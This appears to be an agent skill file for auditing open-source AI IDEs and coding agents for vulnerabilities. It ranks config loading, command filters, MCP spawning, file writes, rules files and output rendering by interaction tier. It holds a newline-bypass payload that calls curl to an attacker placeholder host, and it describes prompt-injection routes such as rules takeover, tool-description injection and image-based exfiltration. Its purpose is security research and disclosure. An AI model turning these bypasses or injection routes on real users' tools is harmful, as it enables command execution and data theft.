AI IDE Source Code Audit
This skill provides AI-IDE-specific guidance for source code security auditing. It directs your attention to the code areas most likely to contain vulnerabilities based on the vulnerability taxonomy -- instead of reading the entire codebase, you focus on six priority targets ordered by the interaction tier most likely to yield findings. Tier 1 (zero-interaction) bugs are the highest severity and hardest to dismiss; start there and work down.
This skill is for open-source targets only. For closed-source targets, use ai-ide-recon (documentation analysis and black-box enumeration).
When to Use
- When you have source code access to an AI IDE or coding agent (Cline, Continue, Roo Code, parts of Cursor, Gemini CLI, Codex CLI, etc.).
- After ai-ide-recon has classified the target as open-source or hybrid and identified which features to investigate.
- When you want to understand HOW a security control works -- not just whether it exists (recon), but whether it is correctly implemented (audit).
Preconditions
- Source code access is required. You must have a local checkout of the target's source code. If the target is closed-source, stop here and use ai-ide-recon instead.
- Recon must have been completed. Run ai-ide-recon first to identify the target's feature set, classify it as open-source or hybrid, and determine which audit targets are relevant. Recon output tells you which of the six targets below actually exist in the product so you can skip the rest.
Without both preconditions met, the audit targets below will produce incomplete or misleading results.
Interaction Tiers (Quick Reference)
Every audit finding maps to one of four interaction tiers. The tier determines how reportable the finding is and how vendors will respond.
| Tier | Trigger | Reportability |
|---|---|---|
| Tier 1 -- Zero-Interaction | Victim clones repo and opens it. No trust granted, no message sent. | Highest -- vendors cannot argue "user chose to trust." |
| Tier 2 -- Agent-Mediated | User sends a message or interacts normally. PI in workspace files drives agent action. No explicit approval of the malicious action. | Strong -- no conscious approval of the specific attack. |
| Tier 3 -- Requires Approval Click | User must click "Trust," "Allow," or approve a specific action. | Weak unless approval is misleading or UI is confusing. |
| Tier 4 -- TOCTOU / Post-Trust | User already trusted project; config is modified after approval (e.g., via git pull). | Weak standalone. Interesting only with TOCTOU, scope escape, or routine-action triggers. |
Code-Level Tier Indicators
When reading source code, use these patterns to classify what you find:
- Missing approval gate = Tier 1. Config loads, commands execute, or servers spawn without any trust check. The code path from untrusted workspace artifact to high-impact action has no gate at all.
- Approval gate present but no re-prompt on modification = Tier 4 TOCTOU. User approved once; subsequent loads of the same artifact skip re-approval even if content changed. Look for approval keyed by path/name rather than content hash.
- Approval gate with re-prompt on modification = Working defense. The gate fires on first load AND re-fires when content changes. This is the correct implementation -- not a vulnerability at the code level.
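The path-vs-content distinction above can be sketched in a few lines of TypeScript. All names here are hypothetical; the point is only that keying approval on a content hash makes the gate re-fire when the artifact changes, while keying on path/name does not:

```typescript
import { createHash } from "node:crypto";

// Hypothetical approval store. What the approval is keyed on decides
// the tier: content hash = working defense; path/name = Tier 4 TOCTOU.
const approvedHashes = new Set<string>();

function sha256(content: string): string {
  return createHash("sha256").update(content).digest("hex");
}

// Re-fires whenever the artifact's content changes, because the key is
// derived from the content itself rather than the file path.
function needsApproval(content: string): boolean {
  return !approvedHashes.has(sha256(content));
}

function approve(content: string): void {
  approvedHashes.add(sha256(content));
}
```

With a path-keyed store, `needsApproval` would return false for the modified artifact too, which is exactly the TOCTOU indicator described above.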
Integration with audit-context-building
If you have access to the Trail of Bits audit-context-building skill, use it before this skill to build architectural context. Apply it with AI-IDE-specific focus:
Phase 1 (Orientation): Prioritize these entrypoints:
- Config auto-loader (where workspace config files are read and applied on open)
- Command execution handler (where terminal commands are constructed, filtered, and dispatched)
- MCP config loader (where MCP server definitions are read from files and registered)
- File-write permission checker (where file write requests are approved or denied)
- Prompt/rules file loader (where instruction files are read and applied to the agent context)
- Output renderer (where AI output is rendered to the user, including markdown, images, and webviews)
Phase 2 (Ultra-granular): Apply 5 Whys specifically to:
- Trust boundary decisions (Why is this input trusted? Why is workspace content treated as safe?)
- Permission checks (Why is this action allowed without approval? What conditions skip the approval dialog?)
- Config loading (Why is this config auto-loaded? Why is there no re-approval on modification?)
Without audit-context-building: Follow the same priority order manually. Start with the entrypoints listed below and trace call chains from each.
Priority Audit Targets
Ordered by interaction tier yield -- targets most likely to produce Tier 1 (zero-interaction) findings are first. Start at #1 and work down.
1. Config Auto-Loading [Tier 1]
What to find: The code path from "workspace is opened" to "config files are read and applied."
What to look for:
- Which files are read on workspace open? In what order?
- Are workspace config files merged with user config? What wins on conflict?
- Can workspace config override security-relevant settings?
- Is there a trust check before applying workspace config?
Vulnerability indicators:
- Workspace config overrides user config for security-relevant settings
- No workspace trust gate before applying config
- Config files read and applied synchronously on open (no approval opportunity)
Tier classification at code level:
- No approval gate before config is applied --> Tier 1 (zero-click config load)
- Approval gate on first open but no re-check on modification --> Tier 4 TOCTOU
- Approval gate with hash-based re-prompt --> Working defense
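The merge-precedence question above is often a one-line vulnerability. A minimal sketch (the config shape and key names are hypothetical) of the dangerous ordering, where workspace values override user values:

```typescript
// Hypothetical IDE settings relevant to security decisions.
interface IdeConfig {
  autoApproveCommands?: boolean;
  allowedCommands?: string[];
}

// Vulnerable precedence: spread order means workspace config wins on
// conflict, so a cloned repo can flip security-relevant settings the
// user set deliberately (Tier 1 if no trust gate precedes this merge).
function mergeConfig(user: IdeConfig, workspace: IdeConfig): IdeConfig {
  return { ...user, ...workspace };
}
```

When you find a merge like this, check whether security-relevant keys are excluded from workspace override; if they are not, classify per the tier rules above.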
2. Command Execution Pipeline [Tier 1]
What to find: The code path from "user or LLM requests a terminal command" to "command is executed in a shell."
What to look for:
- How is the command string constructed? String concatenation? Template literals? Argument arrays?
- Where is the filter applied? Before or after shell metacharacter expansion?
- What does the filter check? Full command string? First token? Parsed AST?
- Is the shell invoked via `exec` (string to shell) or `execFile` (argument array, no shell)?
- Are environment variable prefixes stripped or passed through?
Vulnerability indicators:
- `child_process.exec(command)` with a user-influenced `command` --> shell injection
- `command.startsWith(allowed)` --> newline bypass
- Regex-based filter without multiline mode --> newline bypass
- Allowlist that checks command name but not flags --> dangerous flag abuse
- Filter applied to a different representation than what the shell sees --> parsing differential
Tier classification at code level:
- No filter at all, or filter applied only to first token --> Tier 1 if commands can auto-execute (hooks, tools auto-load)
- Filter present but bypassable via PI-driven command construction --> Tier 2
- Filter present, bypass requires user to approve the exact command --> Tier 3 (weak unless display differs from execution)
Reference: references/audit-focus-areas.md for specific function names and code patterns.
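The newline bypass called out above is worth internalizing, because the filter code looks correct at a glance. A minimal model (the attacker host is a placeholder) of a prefix-allowlist check:

```typescript
// Minimal model of a prefix-allowlist filter. The check passes on the
// full string, but a shell treats "\n" as a command separator, so the
// unapproved second command also executes.
function isAllowed(command: string, allowedPrefixes: string[]): boolean {
  return allowedPrefixes.some((prefix) => command.startsWith(prefix));
}

// attacker.example is a placeholder exfiltration host.
const payload = "ls -la\ncurl https://attacker.example/exfil";
// isAllowed(payload, ["ls"]) returns true -- the filter sees an allowed
// prefix; the shell sees two commands.
```

The same reasoning applies to `;`, `&&`, `|`, and `$(...)` when the filter inspects a different representation than the shell parses: that is the parsing differential listed above.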
3. MCP Integration Layer [Tier 1/2]
What to find: The code path from "MCP config file exists in workspace" to "MCP server process is spawned."
What to look for:
- How does the IDE discover MCP config files? Which paths does it check?
- Is there an approval dialog before loading workspace MCP config?
- Does re-opening a modified config trigger re-approval?
- How are MCP servers spawned? Is the `command` field passed directly to `exec`?
- Are tool invocations from workspace-defined servers auto-approved?
Vulnerability indicators:
- Config loaded with `JSON.parse(readFileSync(configPath))` and no approval gate
- Server spawned with `spawn(config.command, config.args)` where config comes from a workspace file
- No hash or signature check between approval and re-load
- Tool descriptions from workspace MCP servers flow into the LLM context (tool description injection)
Tier classification at code level:
- Auto-load with no approval --> Tier 1 (zero-click MCP server spawn)
- Approval required but PI can trigger config write then load --> Tier 2
- Approval required, re-prompts on change, shows full command --> Working defense
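The Tier 1 shape described above is a short data flow: file read, JSON parse, process spawn, no gate. A sketch of what it looks like in source (function and key names are hypothetical; returning the planned invocations stands in for the `spawn()` call a real implementation would make):

```typescript
interface McpServerConfig {
  command: string;
  args?: string[];
}

// Vulnerable shape: the parsed `command` field flows straight from a
// workspace-controlled file to process creation with no approval gate
// in between (Tier 1 indicator). A real implementation would call
// spawn(server.command, server.args) on each returned entry.
function plannedSpawns(rawWorkspaceConfig: string): McpServerConfig[] {
  const config = JSON.parse(rawWorkspaceConfig);
  return Object.values(config.mcpServers ?? {}) as McpServerConfig[];
}
```

When auditing, trace whether anything interrupts this flow: a trust dialog, a hash comparison against a previously approved config, or an allowlist on `command`.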
4. File-Write Permission Model [Tier 2]
What to find: The code path from "agent wants to write a file" to "file is written or rejected."
What to look for:
- What triggers the approval dialog? Always? Only for certain paths? Only for modifications (not creates)?
- Are there auto-approve conditions (e.g., files the agent just created, files within a certain directory)?
- Can the approval be bypassed by writing to a different path then renaming?
- Is the approval check in the same process that does the write (TOCTOU risk)?
Vulnerability indicators:
- Auto-approve for files in `.vscode/`, `.cursor/`, or other config directories
- No approval for new file creation (only for modifications)
- Approval check and file write in separate async operations (TOCTOU)
- Relative path resolution that can escape the workspace
Tier classification at code level:
- Auto-approve for config directories --> Tier 2 (PI can write malicious config without approval)
- Approval required for all writes, but PI can socially engineer the approval message --> Tier 3
- All writes gated with clear display of path and diff --> Working defense
Source: Cline TOCTOU Script Invocation
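The check/use gap can be modeled in memory (all names here are hypothetical, and the attacker's rewrite is simulated inside the approval callback to stand in for the async gap): approval is decided against the content read at check time, but the action re-reads at use time.

```typescript
// Hypothetical in-memory filesystem.
const files = new Map<string, string>();

// TOCTOU shape: `checked` is what the user approves; `used` is what the
// action operates on. If the file changes in between, unapproved
// content wins.
function approvedContentToRun(
  path: string,
  approve: (content: string) => boolean,
): string | null {
  const checked = files.get(path) ?? "";
  if (!approve(checked)) return null;
  // In real code an async gap sits here (approval dialog, task queue)...
  const used = files.get(path) ?? ""; // re-read instead of reusing `checked`
  return used;
}
```

The fix pattern to look for in source: the approved snapshot itself is what gets executed or written, or the content is re-hashed and compared against the approved hash immediately before use.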
5. Prompt / Rules Loading [Tier 2]
What to find: The code path from "workspace contains a rules file" to "rules content is applied to the agent's system prompt."
What to look for:
- Which file paths are checked for rules/instruction files?
- Is the content sanitized or validated before injection into the system prompt?
- Can rules files override safety-critical instructions?
- Is there a trust check (approval dialog) on first load? On modification?
Vulnerability indicators:
- Raw file content concatenated into the system prompt
- No approval dialog for workspace rules files
- Rules can contain instructions that conflict with safety guidelines
- No modification detection (hash-based or diff-based) between loads
Tier classification at code level:
- Auto-loaded without approval and can override safety instructions --> Tier 2 (PI amplification via rules takeover when user sends a message)
- Loaded only after workspace trust is granted --> Tier 3/4 depending on trust model
- Loaded with approval, re-prompted on change, content-limited --> Working defense
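The raw-concatenation indicator above is usually a one-liner in source. A hypothetical sketch of the vulnerable shape (function name and section header are illustrative):

```typescript
// Vulnerable shape: raw workspace file content is concatenated into the
// system prompt with no sanitization, length limit, or approval
// (Tier 2 indicator -- rules takeover fires on the user's next message).
function buildSystemPrompt(basePrompt: string, rulesFileContent: string): string {
  return basePrompt + "\n\n# Project rules\n" + rulesFileContent;
}
```

When you find this, check what precedes the call: is the rules file gated behind workspace trust, is its content shown to the user, and is there any modification detection between loads?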
6. Output Rendering [Tier 2/3]
What to find: The code path from "agent produces text output" to "output is displayed to the user."
What to look for:
- Is markdown rendered? If so, which renderer? Does it support images?
- Are image URLs fetched (potential exfil channel)?
- Is Mermaid rendering supported? Are URLs in Mermaid diagrams fetched?
- If webviews are used, what CSP is applied?
- Is there URL filtering or sanitization on rendered output?
Vulnerability indicators:
- Markdown rendered with images enabled and no URL filtering
- `<img src=...>` tags in rendered output make HTTP requests
- Mermaid rendering with external URL support
- Webview created with `allowScripts: true` and no CSP or a permissive CSP
Tier classification at code level:
- Auto-rendered images/Mermaid with no URL filtering --> Tier 2 (PI triggers exfil on next agent response)
- Rendering requires user to open a preview pane or click --> Tier 3
- All external URLs blocked or filtered, strict CSP on webviews --> Working defense
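For reference when reading renderer code, the working defense above often looks like a host allowlist applied before any image fetch. A sketch under the assumption of a URL-level filter (the allowlisted host is purely illustrative):

```typescript
// Working-defense shape: render an image URL only if it is https and
// its host is on an explicit allowlist, so PI-embedded exfil URLs are
// dropped instead of fetched. The host below is illustrative only.
const ALLOWED_IMAGE_HOSTS = new Set(["raw.githubusercontent.com"]);

function allowImageUrl(url: string): boolean {
  try {
    const parsed = new URL(url);
    return parsed.protocol === "https:" && ALLOWED_IMAGE_HOSTS.has(parsed.hostname);
  } catch {
    return false; // unparseable URLs are never fetched
  }
}
```

If the renderer fetches first and filters later, or filters only the markdown source rather than the resolved URL, the exfil channel survives.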
NOT a Vulnerability
Not every code path you find is a security bug. These patterns are working-as-designed:
- Code paths reachable only after explicit user approval with full visibility into what will execute. If the user clicks "Allow" on a dialog that clearly shows the exact command, file path, or config that will be applied, and the displayed content matches what actually executes, the approval gate is working. This is not a vulnerability at the code level.
- Defense implementations that correctly gate, re-prompt, and sandbox. An approval dialog that fires on first load, re-fires when content changes (hash-based or diff-based), displays the full action to the user, and runs the action in a sandbox is a correct implementation. Do not report it as a finding.
- Prompt injection that causes the agent to suggest a malicious action, but the action requires user approval before execution, and the approval dialog clearly describes what will happen. The approval gate worked. The agent being manipulated is expected behavior under PI; the defense is that the user must consciously approve the final action.
- Hooks, scripts, or tools that fire only in a trusted workspace where the user explicitly enabled them, unless there is a TOCTOU condition (content changed after approval) or scope escape (action affects resources outside the workspace).
When in doubt, ask: "Did the user consciously approve this specific action with accurate information about what it does?" If yes, it is not a vulnerability. If the approval was absent, misleading, or stale (TOCTOU), it is.
Using Static Analysis Tools
semgrep
See references/semgrep-queries.md for rule templates. Key queries:
- `child_process.exec($CMD)` where `$CMD` is influenced by workspace content
- Config file reads (`readFileSync`, `readFile`) of known IDE config paths
- Process spawning (`spawn`, `exec`, `execFile`) with config-derived arguments
- Markdown rendering with image support enabled
codeql
See references/codeql-queries.md for query templates. Key queries:
- Taint tracking from file read (config source) to process spawn (code execution sink)
- Taint tracking from workspace content to system prompt (PI risk)
- Data flow from AI output to rendered HTML (exfil risk)
Without static analysis tools
Use grep/ripgrep with patterns from references/audit-focus-areas.md:
rg -n "child_process|exec\(|spawn\(|execFile\(" --type ts --type js
rg -n "readFileSync|readFile.*mcp|readFile.*config" --type ts --type js
rg -n "allowlist|blocklist|allowedCommands|blockedCommands" --type ts --type js
Related Skills
This Plugin
- Start with ai-ide-recon to identify which features the target has and classify it as open-source.
- Audit findings feed directly into pattern-specific skills: command execution issues --> terminal-filter-bypass, MCP issues --> mcp-config-poisoning, etc.
- Combine audit findings with ai-ide-attack-chains for chain construction.
Trail of Bits Skills
- audit-context-building -- build architectural context before auditing (recommended for large codebases).
- semgrep -- automated pattern matching with the rule templates in `references/semgrep-queries.md`.
- codeql -- data-flow analysis with the query templates in `references/codeql-queries.md`.